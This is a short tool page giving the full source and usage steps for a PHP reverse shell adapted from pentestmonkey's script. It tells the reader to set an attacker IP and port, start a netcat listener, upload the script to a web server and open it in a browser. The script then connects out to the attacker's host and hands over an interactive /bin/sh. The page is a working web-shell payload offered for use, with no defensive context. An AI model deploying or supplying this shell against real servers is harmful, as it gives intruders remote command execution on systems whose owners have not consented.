Function:
Returns an interactive shell.
Usage:
First change the two variables $ip and $port in the script to the values you need, then listen on $port locally. For example:
$ip = '192.168.1.111'; // CHANGE THIS
$port = 13123; // CHANGE THIS
nc -v -l -p 13123
Then upload the PHP script and open it in a browser.
Screenshot:
Source code (modified from the original):
<?php
set_time_limit(0);                  // do not stop at PHP's default execution time limit
$ip   = "192.168.1.111";            // CHANGE THIS
$port = "13123";                    // CHANGE THIS
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock)
    exit("$errstr ($errno)");
if (function_exists('proc_open')) {
    $descriptorspec = array(
        0 => array("pipe", "r"),    // child's stdin
        1 => array("pipe", "w"),    // child's stdout
        2 => array("pipe", "w")     // child's stderr
    );
    $process = proc_open("id;/bin/sh -i", $descriptorspec, $pipes);
    if (!is_resource($process))
        exit("ERROR: Can't reverse shell");
    stream_set_blocking($pipes[0], 0);
    stream_set_blocking($pipes[1], 0);
    stream_set_blocking($pipes[2], 0);
    stream_set_blocking($sock, 0);
    print("Successfully opened reverse shell to $ip:$port");
    while (1) {
        if (feof($sock)) {
            print("ERROR: Shell connection terminated");
            break;
        }
        if (feof($pipes[1])) {
            print("ERROR: Shell process terminated");
            break;
        }
        $input = fread($sock, 1024);      // socket -> shell stdin
        fwrite($pipes[0], $input);
        $output = fread($pipes[1], 1024); // shell stdout -> socket
        fwrite($sock, $output);
        $output = fread($pipes[2], 1024); // shell stderr -> socket
        fwrite($sock, $output);
    }
    fclose($sock);
    fclose($pipes[0]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($process);
}
else print "function 'proc_open' does not exist.";
?>
Original: http://pentestmonkey.net/tools/web-shells/php-reverse-shell